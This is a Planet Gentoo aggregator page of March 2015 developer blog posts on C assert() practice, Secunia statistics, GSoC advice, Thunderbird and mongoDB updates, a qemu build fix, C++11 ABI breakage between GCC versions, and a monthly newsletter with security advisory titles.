Gentoo Logo
Gentoo Logo Side
Gentoo Spaceship

. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Faulhammer
. Christian Ruppert
. Christopher Harvey
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jauhien Piatlicki
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Theo Chatzimichos
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Victor Ostorga
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
March 29, 2015, 23:03 UTC

Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.

Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Planet Gentoo, an aggregation of Gentoo-related weblog articles written by Gentoo developers. For a broader range of topics, you might be interested in Gentoo Universe.

March 27, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Again on assert() (March 27, 2015, 12:25 UTC)

Since apparently there are still people not reading the fine man page.

If the macro NDEBUG was defined at the moment was last included, the macro assert() generates no code, and hence does nothing at all.
Otherwise, the macro assert() prints an error message to standard error and terminates the program by calling abort(3) if expression is false (i.e., compares equal to zero).
The purpose of this macro is to help the programmer find bugs in his program. The message “assertion failed in file foo.c, function do_bar(), line 1287″ is of no help at all to a user.

I guess it is time to return on security and expand a bit which are good practices and which are misguided ideas that should be eradicated to reduce the amount of Deny Of Service waiting to happen.

Security issues

The term “Security issue” covers a lot of different kind of situations. Usually unhanded paths in the code lead to memory corruption, memory leaks, crashes and other less evident problems such as information leaks.

I’m focusing on crashes today, assume the others are usually more annoying or dangerous, it might be true or not depending on the scenarios:

If you are watching a movie and you have a glitch in the bitstream that makes the application leak some memory you would not care at all as long you can enjoy your movie. If the same glitch makes VLC to close suddenly a second before you get to see who is the mastermind behind a really twisted plot… I guess you’ll scream at whoever thought was a good idea to crash there.

If a glitch might get an attacker to run arbitrary code while you are watching your movie probably you’d like better to have your player to just crash instead.

It is a false dichotomy since what you want is to have the glitch handled properly, and keep watching the rest of the movie w/out having VLC crashing w/out any meaningful information for you to know.

Errors must be handled, trading a crash for something else you consider worse is just being naive.

What is assert exactly?

assert is a debugging facility mandated by POSIX and C89 and C99, it is a macro that more or less looks like this

#define assert()                                       \
    if (condition) {                                   \
        do_nothing();                                  \
    } else {                                           \
       fprintf(stderr, "%s %s", __LINE__, __func__);   \
       abort();                                        \

If the condition does not happen crash, here the real-life version from musl

#define assert(x) ((void)((x) || (__assert_fail(#x, __FILE__, __LINE__, __func__),0)))

How to use it

Assert should be use to verify assumptions. While developing they help you to verify if your
assumptions meet reality. If not they tell you that should investigate because something is
clearly wrong. They are not intended to be used in release builds.
- some wise Federico while talking about another language asserts

Usually when you write some code you might do something like this to make sure you aren’t doing anything wrong, you start with

int my_function_doing_difficult_computations(Structure *s)
   a = some_computation(s);
   b = other_operations(a, s);
   c = some_input(s, b);
   idx = some_operation(a, b, c);

   return some_lut[idx];

Where idx in a signed integer, and so a, b, c are with some ranges that might or not depend on some external input.

You do not want to have idx to be outside the range of the lookup table array some_lut and you are not so sure. How to check that you aren’t getting outside the array?

When you write the code usually you iteratively improve a prototype, you can add tests to make sure every function is returning values within the expected range and you can use assert() as a poor-man C version of proper unit-testing.

If some function depends on values outside your control (e.g. an input file), you usually do validation over them and cleanly error out there. Leaving external inputs unaccounted or, even worse, put an assert() there is really bad.

Unit testing and assert()

We want to make sure our function works fine, let’s make a really tiny test.

void test_some_computation(void) { Structure *s = NULL; int i; while (input_generator(&s, i)) { int a = some_computation(s); assert(a > 0 && a <10); } }

It is compact and you can then run your test under gdb and inspect a bit around. Quite good if you are refactoring the innards of some_computation() and you want to be sure you did not consider some corner case.

Here assert() is quite nice since we can pack in a single line the testcase and have a simple report if something went wrong. We could do better since assert does not tell use the value or how we ended up there though.

You might not be that thorough and you can just decide to put the same assert in your function and check there, assuming you cover all the input space properly using regression tests.

To crash or not to crash

The people that consider OK crashing on runtime (remember the sad user that cannot watch his wonderful movie till the end?) suggest to leave the assert enabled at runtime.

If you consider the example above, would be better to crash than to read a random value from the memory? Again this is a false dichotomy!

You can expect failures, e.g. broken bitstreams and you want to just check and return a proper failure message.

In our case some_input() return value should be checked for failures and the return value forwarder further up till the library user that then will decide what to do.

Now remains the access to the lookup table. If you didn’t check sufficiently the other functions you might get a bogus index and if you get a bogus index you will read from random memory (crashing or not depending if the random memory is on an address mapped to the program outside). Do you want to have an assert() there? Or you’d rather ad another normal check with a normal failure path?

An correct answer is to test your code enough so you do not need to add yet another check and, in fact, if the problem arises is wrong to add a check there, or, even worse an assert(), you should just go up in the execution path and fix the problem where it is: a non validated input, a wrong “optimization” or something sillier.

There is open debate on if having assert() enabled is a good or bad practice when talking about defensive design. In C, in my opinion, it is a complete misuse. You if you want to litter your release code with tons of branches you can also spend time to implement something better and make sure to clean up correctly. Calling abort() leaves your input and output possibly in severely inconsistent state.

How to use it the wrong way

I want to trade a crash anytime the alternative is memory corruption
- some misguided guy

Assume you have something like that

int size = some_computation(s);
uint8_t *p;
uint8_t *buf = p = malloc(size);

while (some_related_computations(s)) {
   do_stuff_(s, p);
   p += 4;

assert(p - buf == size);

If some_computation() and some_related_computation(s) do not agree, you might write over the allocated buffer! The naive person above starts talking about how the memory is corrupted by do_stuff() and horrible things (e.g. foreign code execution) could happen without the assert() and how even calling return at that point is terrible and would lead to horrible horrible things.

Ok, NO. Stop NOW. Go up and look at how assert is implemented. If you check at that point that something went wrong, you have the corruption already. No matter what you do, somebody could exploit it depending on how naive you had been or unlucky.

Remember: assert() does do I/O, allocates memory, raises a signal and calls functions. All that you would rather not do when your memory is corrupted is done by assert().

You can be less naive.

int size = some_computation(s);
uint8_t *p;
uint8_t *buf = p = malloc(size);

while (some_related_computations(s) && size > 4) {
   do_stuff_(s, p);
   p    += 4;
   size -= 4;
assert(size != 0);

But then, instead of the assert you can just add

if (size != 0) {
    msg("Something went really wrong!");
    log("The state is %p", s->some_state);
    goto fail;

This way when the “impossible” happens the user gets a proper notification and you can recover cleanly and no memory corruption ever happened.

Better than assert

Albeit being easy to use and portable assert() does not provide that much information, there are plenty of tools that can be leveraged to get better reporting.

In Closing

assert() is a really nice debugging tool and it helps a lot to make sure some state remains invariant while refactoring.

Leaving asserts in release code, on the other hand, is quite wrong, it does not give you any additional safety. Please do not buy the fairly tale that assert() saves you from the scary memory corruption issues, it does NOT.

March 26, 2015
Alex Legler a.k.a. a3li (homepage, bugs)
On Secunia’s Vulnerability Review 2015 (March 26, 2015, 19:44 UTC)

Today, Secunia have released their Vulnerability Review 2015, including various statistics on security issues fixed in the last year.

If you don’t know about Secunia’s services: They aggregate security issues from various sources into a single stream, or as they call it: they provide vulnerability intelligence.
In the past, this intelligence was available to anyone in a free newsletter or on their website. Recent changes however caused much of the useful information to go behind login and/or pay walls. This circumstance has also forced us at the Gentoo Security team to cease using their reports as references when initiating package updates due to security issues.

Coming back to their recently published document, there is one statistic that is of particular interest: Gentoo is listed as having the third largest number of vulnerabilities in a product in 2014.

from Secunia: Secunia Vulnerability Review 2015 ( Secunia: Secunia Vulnerability Review 2015

Looking at the whole table, you’d expect at least one other Linux distribution with a similarly large pool of available packages, but you won’t find any.

So is Gentoo less secure than other distros? tl;dr: No.

As Secunia’s website does not let me see the actual “vulnerabilities” they have counted for Gentoo in 2014, there’s no way to actually find out how these numbers came into place. What I can see though are “Secunia advisories” which seem to be issued more or less for every GLSA we send. Comparing the number of posted Secunia advisories for Gentoo to those available for Debian 6 and 7 tells me something is rotten in the state of Denmark (scnr):
While there were 203 Secunia advisories posted for Gentoo in the last year, Debian 6 and 7 had 304, yet Debian would have to have fixed less than 105 vulnerabilities in (55+249=) 304 advisories to be at least rank 21 and thus not included in the table above. That doesn’t make much sense. Maybe issues in Gentoo’s packages are counted for the distribution as well—no idea.

That aside, 2014 was a good year in terms of security for Gentoo: The huge backlog of issues waiting for an advisory was heavily reduced as our awesome team managed to clean up old issues and make them known to glsa-check in three wrap-up advisories—and then we also issued 239 others, more than ever since 2007. Thanks to everyone involved!

March 18, 2015
Jan Kundrát a.k.a. jkt (homepage, bugs)

It is that time of the year again, and people are applying for Google Summer of Code positions. It's great to see a big crowd of newcomers. This article explains what sort of students are welcome in GSoC from the point of view of Trojitá, a fast Qt IMAP e-mail client. I suspect that many other projects within KDE share my views, but it's best to ask them. Hopefully, this post will help students understand what we are looking for, and assist in deciding what project to work for.

Finding a motivation

As a mentor, my motivation in GSoC is pretty simple — I want to attract new contributors to the project I maintain. This means that I value long-term sustainability above fancy features. If you are going to apply with us, make sure that you actually want to stick around. What happens when GSoC terminates? What happens when GSoC terminates and the work you've been doing is not ready yet? Do you see yourself continuing the work you've done so far? Or is it going to become an abandonware, with some cash in your pocket being your only reward? Who is going to maintain the code which you worked hard to create?

Selecting an area of work

This is probably the most important aspect of your GSoC involvement. You're going to spend three months of full time activity on some project, a project you might have not heard about before. Why are you doing this — is it only about the money, or do you already have a connection to the project you've selected? Is the project trying to solve a problem that you find interesting? Would you use the results of that project even without the GSoC?

My experience shows that it's best to find a project which fills a niche that you find interesting. Do you have a digital camera, and do you think that a random photo editor's interface sucks? Work on that, make the interface better. Do you love listening to music? Maybe your favorite music player has some annoying bug that you could fix. Maybe you could add a feature to, say, synchronize the playlist with your cell phone (this is just an example, of course). Do you like 3D printing? Help improve an existing software for 3D printing, then. Are you a database buff? Is there something you find lacking in, e.g., PostgreSQL?

Either way, it is probably a good idea to select something which you need to use, or want to use for some reason. It's of course fine to e.g. spend your GSoC term working on an astronomy tool even though you haven't used one before, but unless you really like astronomy, then you should probably choose something else. In case of Trojitá, if you have been using GMail's web interface for the past five years and you think that it's the best thing since sliced bread, well, chances are that you won't enjoy working on a desktop e-mail client.

Pick something you like, something which you enjoy working with.

Making a proposal

An excellent idea is to make yourself known in advance. This does not happen by joining the IRC channel and saying "I want to work on GSoC", or mailing us to let us know about this. A much better way of getting involved is through showing your dedication.

Try to play with the application you are about to apply for. Do you see some annoying bug? Fix it! Does it work well? Use the application more; you will find bugs. Look at the project's bug tracker, maybe there are some issues which people are hitting. Do you think that you can fix it? Diving into bug fixing is an excellent opportunity to get yourself familiar with the project's code base, and to make sure that our mentors know the style and pace of your work.

Now that you have some familiarity with the code, maybe you can already see opportunities for work besides what's already described on the GSoC ideas wiki page. That's fine — the best proposals usually come from students who have found them on their own. The list of ideas is just that, a list of ideas, not an exhaustive cookbook. There's usually much more what can be done during the course of the GSoC. What would be most interesting area for you? How does it fit into the bigger picture?

After you've thought about the area to work on, now it's time to write your proposal. Start early, and make sure that you talk about your ideas with your prospective mentors before you spend three hours preparing a detailed roadmap. Define the goals that you want to achieve, and talk with your mentors about them. Make sure that the work fits well with the length and style of the GSoC.

And finally, be sure that you stay open and honest with your mentoring team. Remember, this is not a contest of writing a best project proposal. For me, GSoC is all about finding people who are interested in working on, say, Trojitá. What I'm looking for are honest, fair-behaving people who demonstrate willingness to learn new stuff. On top of that, I like to accept people with whom I have already worked. Hearing about you for the first time when I read your GSoC proposal is not a perfect way of introducing yourself. Make yourself known in advance, and show us how you can help us make our project better. Show us that you want to become a part of that "we".

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Upgrading ThunderBird (March 18, 2015, 02:35 UTC)

With the recent update from the LongTimeSuffering / ExtendedSufferingRelease of Thunderbird from 24 to 31 we encountered some serious badness.

The best description of the symptoms would be "IMAP doesn't work at all"
On some machines the existing accounts would be disappeared, on others they would just be inert and never receive updates.

After some digging I was finally able to find the cause of this:
Too old config file.

Uhm ... what? Well - some of these accounts have been around since TB2. Some newer ones were enhanced by copying the prefs.js from existing accounts. And so there's a weird TB bugreport that is mostly triggered by some bits being rewritten around Firefox 30, and the config parser screwing up with translating 'old' into 'new', and ... effectively ... IMAP being not-whitelisted, thus by default blacklisted, and hilarity happens.

Should you encounter this bug you "just" need to revert to a prefs.js from before the update (sigh) and then remove all lines involving "capability.policy".
Then update and ... things work. Whew.

Why not just remove profile and start with a clean one you say? Well ... for one TB gets brutally unusably slow if you have emails. So just re-reading the mailbox content from a local fast IMAP server will take ~8h and TB will not respond to user input during that time.
And then you manually have to go into eeeevery single subfolder so that TB remembers it is there and actually updates it. That's about one work-day per user lost to idiocy, so sed'ing the config file into compliance is the easy way out.
Thank you, Mozilla, for keeping our lives exciting!

March 17, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
mongoDB 3.0.1 (March 17, 2015, 13:46 UTC)

This is a quite awaited version bump coming to portage and I’m glad to announce it’s made its way to the tree today !

I’ll right away thank a lot Tomas Mozes and Darko Luketic for their amazing help, feedback and patience !


I introduced quite some changes in this ebuild which I wanted to share with you and warn you about. MongoDB upstream have stripped quite a bunch of things out of the main mongo core repository which I have in turn split into ebuilds.

Major changes :

  • respect upstream’s optimization flags : unless in debug build, user’s optimization flags will be ignored to prevent crashes and weird behaviour.
  • shared libraries for C/C++ are not built by the core mongo respository anymore, so I removed the static-libs USE flag.
  • various dependencies optimization to trigger a rebuild of mongoDB when one of its linked dependency changes.


The new tools USE flag allows you to pull a new ebuild named app-admin/mongo-tools which installs the commands listed below. Obviously, you can now just install this package if you only need those tools on your machine.

  • mongodump / mongorestore
  • mongoexport / mongoimport
  • mongotop
  • mongofiles
  • mongooplog
  • mongostat
  • bsondump


The MMS agent has now some real version numbers and I don’t have to host their source on Gentoo’s infra woodpecker. At the moment there is only the monitoring agent available, shall anyone request the backup one, I’ll be glad to add its support too.


I took this opportunity to add the dev-libs/mongo-cxx-driver to the tree and bump the mongo-c-driver one. Thank you to Balint SZENTE for his insight on this.

March 15, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Wir unterbrechen für eine kurze Durchsage:

Gentoo Linux ist bei den Chemnitzer Linux-Tagen am

Samstag 21. und
Sonntag 22. März 2015

mit einem Stand vertreten.

Es gibt unter anderem Gentoo-T-Shirts, Lanyards und Buttons zum selbst kompilieren.

Hanno Böck a.k.a. hanno (homepage, bugs)

Just wanted to quickly announce two talks I'll give in the upcoming weeks: One at BSidesHN (Hannover, 20th March) about some findings related to PGP and keyservers and one at the Easterhegg (Braunschweig, 4th April) about the current state of TLS.

A look at the PGP ecosystem and its keys

PGP-based e-mail encryption is widely regarded as an important tool to provide confidential and secure communication. The PGP ecosystem consists of the OpenPGP standard, different implementations (mostly GnuPG and the original PGP) and keyservers.

The PGP keyservers operate on an add-only basis. That means keys can only be uploaded and never removed. We can use these keyservers as a tool to investigate potential problems in the cryptography of PGP-implementations. Similar projects regarding TLS and HTTPS have uncovered a large number of issues in the past.

The talk will present a tool to parse the data of PGP keyservers and put them into a database. It will then have a look at potential cryptographic problems. The tools used will be published under a free license after the talk.

Source code
A look at the PGP ecosystem through the key server data (background paper)

Some tales from TLS

The TLS protocol is one of the foundations of Internet security. In recent years it's been under attack: Various vulnerabilities, both in the protocol itself and in popular implementations, showed how fragile that foundation is.

On the other hand new features allow to use TLS in a much more secure way these days than ever before. Features like Certificate Transparency and HTTP Public Key Pinning allow us to avoid many of the security pitfals of the Certificate Authority system.

March 11, 2015
Denis Dupeyron a.k.a. calchan (homepage, bugs)
/bin/sh: Argument list too long (March 11, 2015, 19:22 UTC)

I tried building binutils-2.25 in a qemu chroot and I got the following error during the build process:

/bin/sh: Argument list too long

Google wasn’t helpful. So I looked at the code for qemu-2.2.0, which is where my static qemu binary comes from. At some point I stumbled on this line in linux-user/qemu.h:

#define MAX_ARG_PAGES 33

I changed that 33 to a 64, rebuilt, replaced the approriate static binary in my chroot, and the error went away.

March 10, 2015
Anthony Basile a.k.a. blueness (homepage, bugs)

Gentoo allows users to have multiple versions of gcc installed and we (mostly?) support systems where userland is partially build with different versions.  There are both advantages and disadvantages to this and in this post, I’m going to talk about one of the disadvantages, the C++11 ABI incompatibility problem.  I don’t exactly have a solution, but at least we can define what the problem is and track it [1].

First what is C++11?  Its a new standard of C++ which is just now making its way through GCC and clang as experimental.  The current default standard is C++98 which you can verify by just reading the defined value of __cplusplus using the preprocessor.

$  g++ -x c++ -E -P - <<< __cplusplus
$  g++ -x c++ --std=c++98 -E -P - <<< __cplusplus
$  g++ -x c++ --std=c++11 -E -P - <<< __cplusplus

This shouldn’t be surprising, even good old C has standards:

$ gcc -x c -std=c90 -E -P - <<< __STDC_VERSION__
$ gcc -x c -std=c99 -E -P - <<< __STDC_VERSION__
$ gcc -x c -std=c11 -E -P - <<< __STDC_VERSION__

We’ll leave the interpretation of these values as an exercise to the reader.  [2]

The specs for these different standards at least allow for different syntax and semantics in the language.  So here’s an example of how C++98 and C++11 differ in this respect:

// I build with both --std=c++98 and --std=c++11
#include <iostream>
using namespace std;
int main() {
    int i, a[] = { 5, -3, 2, 7, 0 };
    for (i = 0; i < sizeof(a)/sizeof(int); i++)
        cout << a[i] << endl ;
    return 0;
// I build with only --std=c++11
#include <iostream>
using namespace std;
int main() {
    int a[] = { 5, -3, 2, 7, 0 };
    for (auto& x : a)
        cout << x << endl ;
    return 0;

I think most people would agree that the C++11 way of iterating over arrays (or other objects like vectors) is sexy.  In fact C++11 is filled with sexy syntax, especially when it come to its threading and atomics, and so coders are seduced.  This is an upstream choice and it should be reflected in their build system with –std= sprinkled where needed.  I hope you see why you should never add –std= to your CFLAGS or CXXFLAGS.

The syntactic/semantic differences is the first “incompatiblity” and it is really not our problem downstream.  Our problem in Gentoo comes because of ABI incompatibilities between the two standards arrising from two sources: 1) Linking between objects compiled with –std=c++98 and –std=c++11 is not guaranteed to work.  2) Neither is linking between objects both compiled with –std=c+11 but with different versions of GCC differing in their minior release number.  (The minor release number is x in gcc-4.x.y.)

To see this problem in action, let’s consider the following little snippet of code which uses a C++11 only function [3]

#include <chrono>
using namespace std;
int main() {
    auto x = chrono::steady_clock::now;

Now if we compile that with gcc-4.8.3 and check its symbols we get the following:

$ $ g++ --version
g++ (Gentoo Hardened 4.8.3 p1.1, pie-0.5.9) 4.8.3
$ g++ --std=c++11 -c test.cpp
$ readelf -s test.o
Symbol table '.symtab' contains 12 entries:
Num:    Value          Size Type    Bind   Vis      Ndx Name
  0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
  1: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS test.cpp
  2: 0000000000000000     0 SECTION LOCAL  DEFAULT    1
  3: 0000000000000000     0 SECTION LOCAL  DEFAULT    3
  4: 0000000000000000     0 SECTION LOCAL  DEFAULT    4
  5: 0000000000000000     0 SECTION LOCAL  DEFAULT    6
  6: 0000000000000000     0 SECTION LOCAL  DEFAULT    7
  7: 0000000000000000     0 SECTION LOCAL  DEFAULT    5
  8: 0000000000000000    78 FUNC    GLOBAL DEFAULT    1 main
 10: 0000000000000000     0 NOTYPE  GLOBAL DEFAULT  UND _ZNSt6chrono3_V212steady_
 11: 0000000000000000     0 NOTYPE  GLOBAL DEFAULT  UND __stack_chk_fail

We can now confirm that that symbol is in fact in for 4.8.3 but NOT for 4.7.3 as follows:

$ readelf -s /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/ | grep _ZNSt6chrono3_V212steady_
  1904: 00000000000e5698     1 OBJECT  GLOBAL DEFAULT   13 _ZNSt6chrono3_V212steady_@@GLIBCXX_3.4.19
  3524: 00000000000c8b00    89 FUNC    GLOBAL DEFAULT   11 _ZNSt6chrono3_V212steady_@@GLIBCXX_3.4.19
$ readelf -s /usr/lib/gcc/x86_64-pc-linux-gnu/4.7.3/ | grep _ZNSt6chrono3_V212steady_

Okay, so we’re just seeing an example of things in flux.  Big deal?  If you finish linking test.cpp and check what it links against you get what you expect:

$ g++ --std=c++11 -o test.gcc48 test.o
$ ./test.gcc48
$ ldd test.gcc48 (0x000002ce333d0000) => /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/ (0x000002ce32e88000) => /lib64/ (0x000002ce32b84000) => /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/ (0x000002ce3296d000) => /lib64/ (0x000002ce325b1000)
        /lib64/ (0x000002ce331af000)

Here’s where the wierdness comes in.  Suppose we now switch to gcc-4.7.3 and repeat.  Things don’t quite work as expected:

$ g++ --version
g++ (Gentoo Hardened 4.7.3-r1 p1.4, pie-0.5.5) 4.7.3
$ g++ --std=c++11 -o test.gcc47 test.cpp
$ ldd test.gcc47 (0x000003bec8a9c000) => /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/ (0x000003bec8554000) => /lib64/ (0x000003bec8250000) => /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/ (0x000003bec8039000) => /lib64/ (0x000003bec7c7d000)
        /lib64/ (0x000003bec887b000)

Note that it says its linking against 4.8.3/ and not 4.7.3.  That’s because of the order in which the library paths are search is defined in /etc/ and this file is sorted that way it is on purpose.  So maybe it’ll run!  Let’s try:

$ ./test.gcc47
./test.gcc47: relocation error: ./test.gcc47: symbol _ZNSt6chrono12steady_clock3nowEv, version GLIBCXX_3.4.17 not defined in file with link time reference

Nope, no joy.  So what’s going on?  Let’s look at the symbols in both test.gcc47 and test.gcc48:

$ readelf -s test.gcc47  | grep chrono
  9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZNSt6chrono12steady_cloc@GLIBCXX_3.4.17 (4)
 50: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZNSt6chrono12steady_cloc
$ readelf -s test.gcc48  | grep chrono
  9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZNSt6chrono3_V212steady_@GLIBCXX_3.4.19 (4)
 49: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZNSt6chrono3_V212steady_

Whoah!  The symbol wasn’t mangled the same way!  Looking more carefully at *all* the chrono symbols in 4.8.3/ and 4.7.3/ we see the problem.

$ readelf -s /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/ | grep chrono
  353: 00000000000e5699     1 OBJECT  GLOBAL DEFAULT   13 _ZNSt6chrono3_V212system_@@GLIBCXX_3.4.19
 1489: 000000000005e0e0    86 FUNC    GLOBAL DEFAULT   11 _ZNSt6chrono12system_cloc@@GLIBCXX_3.4.11
 1605: 00000000000e1a3f     1 OBJECT  GLOBAL DEFAULT   13 _ZNSt6chrono12system_cloc@@GLIBCXX_3.4.11
 1904: 00000000000e5698     1 OBJECT  GLOBAL DEFAULT   13 _ZNSt6chrono3_V212steady_@@GLIBCXX_3.4.19
 2102: 00000000000c8aa0    86 FUNC    GLOBAL DEFAULT   11 _ZNSt6chrono3_V212system_@@GLIBCXX_3.4.19
 3524: 00000000000c8b00    89 FUNC    GLOBAL DEFAULT   11 _ZNSt6chrono3_V212steady_@@GLIBCXX_3.4.19
$ readelf -s /usr/lib/gcc/x86_64-pc-linux-gnu/4.7.3/ | grep chrono
 1478: 00000000000c6260    72 FUNC    GLOBAL DEFAULT   12 _ZNSt6chrono12system_cloc@@GLIBCXX_3.4.11
 1593: 00000000000dd9df     1 OBJECT  GLOBAL DEFAULT   14 _ZNSt6chrono12system_cloc@@GLIBCXX_3.4.11
 2402: 00000000000c62b0    75 FUNC    GLOBAL DEFAULT   12 _ZNSt6chrono12steady_cloc@@GLIBCXX_3.4.17

Only 4.7.3/ has _ZNSt6chrono12steady_cloc@@GLIBCXX_3.4.17.  Normally when libraries change their exported symbols, they change their SONAME, but this is not the case here, as running `readelf -d` on both shows.  GCC doesn’t bump the SONAME that way for reasons explained in [4].  Great, so just switch around the order of path search in /etc/  Then we get the problem the other way around:

$ ./test.gcc47
$ ./test.gcc48
./test.gcc48: /usr/lib/gcc/x86_64-pc-linux-gnu/4.7.3/ version `GLIBCXX_3.4.19' not found (required by ./test.gcc48)

So no problem if your system has only gcc-4.7.  No problem if it has only 4.8.  But if it has both, then compiling C++11 with 4.7 and linking against libstdc++ for 4.8 (or vice versa) and you get breakage at the binary level.  This is the C++11 ABI incompatibility problem in Gentoo.  As an exercise for the reader, fix!


[1] Bug 542482 – (c++11-abi) [TRACKER] c++11 abi incompatibility

[2] This is an old professor’s trick for saying, hey go find out why c90 doesn’t define a value for __STDC_VERSION__ and let me know, ‘cuz I sure as hell don’t!

[3] This example was inspired by bug #513386.  You can verify that it requires –std=c++11 by dropping the flag and getting yelled at by the compiler.

[4] Upstream explains why in comment #5 of GCC bug #61758.  The entire bug is dedicated to this issue.

March 07, 2015
Gentoo Monthly Newsletter: February 2015 (March 07, 2015, 20:00 UTC)

Gentoo News

Infrastructure News

Service relaunch:

Thanks to our awesome infrastructure team, the website is back online. Below is the announcement as posted on the gentoo-announce mailing list by Robin H. Johnson.

The Gentoo Infrastructure team is proud to announce that we have
re-engineered the mailing list archives, and re-launched it, back at
The prior Mhonarc-based system had numerous problems, and a
complete revamp was deemed the best forward solution to move
forward with. The new system is powered by ElasticSearch
(more features to come).

All existing URLs should either work directly, or redirect you to the new location for that content.

Major thanks to a3li, for his development of this project. Note
that we're still doing some catchup on newer messages, but delays will drop to under 2 hours soon,
with an eventual goal of under 3 minutes.

Please report problems to Bugzilla: Product Websites, Component
Archives [1][2]

Source available at:
git:// (backend)
git:// (frontend)

[1] which is really [2]

Gentoo Developer Moves


Gentoo is made up of 235 active developers, of which 33 are currently away.
Gentoo has recruited a total of 808 developers since its inception.



  • James Le Cuirot joined the Java team
  • Guilherme Amadio joined the Fonts team
  • Mikle Kolyada joined the Embedded team
  • Pavlos Ratis joined the Overlays team
  • Matthew Thode joined the Git mirror team
  • Patrice Clement joined the Java and Python teams
  • Manuel Rüger joined the QA team
  • Markus Duft left the Prefix team
  • Mike Gilbert left the Vmware team
  • Tim Harder left the Games and Tex teams


This section summarizes the current state of the Gentoo ebuild tree.

Architectures 45
Categories 164
Packages 17997
Ebuilds 36495
Architecture Stable Testing Total % of Packages
alpha 3534 687 4221 23.45%
amd64 10983 6536 17519 97.34%
amd64-fbsd 2 1589 1591 8.84%
arm 2687 1914 4601 25.57%
arm64 536 93 629 3.50%
hppa 3102 535 3637 20.21%
ia64 3105 707 3812 21.18%
m68k 592 135 727 4.04%
mips 0 2439 2439 13.55%
ppc 6748 2536 9284 51.59%
ppc64 4329 1074 5403 30.02%
s390 1364 469 1833 10.19%
sh 1466 610 2076 11.54%
sparc 4040 994 5034 27.97%
sparc-fbsd 0 315 315 1.75%
x86 11560 5583 17143 95.25%
x86-fbsd 0 3235 3235 17.98%



The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201502-15 net-fs/samba Samba: Multiple vulnerabilities 479868
201502-14 sys-apps/grep grep: Denial of Service 537046
201502-13 www-client/chromium Chromium: Multiple vulnerabilities 537366
201502-12 dev-java/oracle-jre-bin (and 2 more) Oracle JRE/JDK: Multiple vulnerabilities 507798
201502-11 app-arch/cpio GNU cpio: Multiple vulnerabilities 530512
201502-10 media-libs/libpng libpng: User-assisted execution of arbitrary code 531264
201502-09 app-text/antiword Antiword: User-assisted execution of arbitrary code 531404
201502-08 media-video/libav Libav: Multiple vulnerabilities 492582
201502-07 dev-libs/libevent libevent: User-assisted execution of arbitrary code 535774
201502-06 www-servers/nginx nginx: Information disclosure 522994
201502-05 net-analyzer/tcpdump tcpdump: Multiple vulnerabilities 534660
201502-04 www-apps/mediawiki MediaWiki: Multiple vulnerabilities 498064
201502-03 net-dns/bind BIND: Multiple Vulnerabilities 531998
201502-02 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 536562
201502-01 media-sound/mpg123 mpg123: User-assisted execution of arbitrary code 500262

Package Removals/Additions


Package Developer Date
dev-ml/obrowser aballier 02 Feb 2015
games-server/tetrix pacho 03 Feb 2015
app-emulation/wine-doors pacho 03 Feb 2015
dev-libs/libgeier pacho 03 Feb 2015
dev-games/ggz-client-libs pacho 03 Feb 2015
dev-games/libggz pacho 03 Feb 2015
games-board/ggz-gtk-client pacho 03 Feb 2015
games-board/ggz-gtk-games pacho 03 Feb 2015
games-board/ggz-sdl-games pacho 03 Feb 2015
games-board/ggz-txt-client pacho 03 Feb 2015
games-board/xfrisk pacho 03 Feb 2015
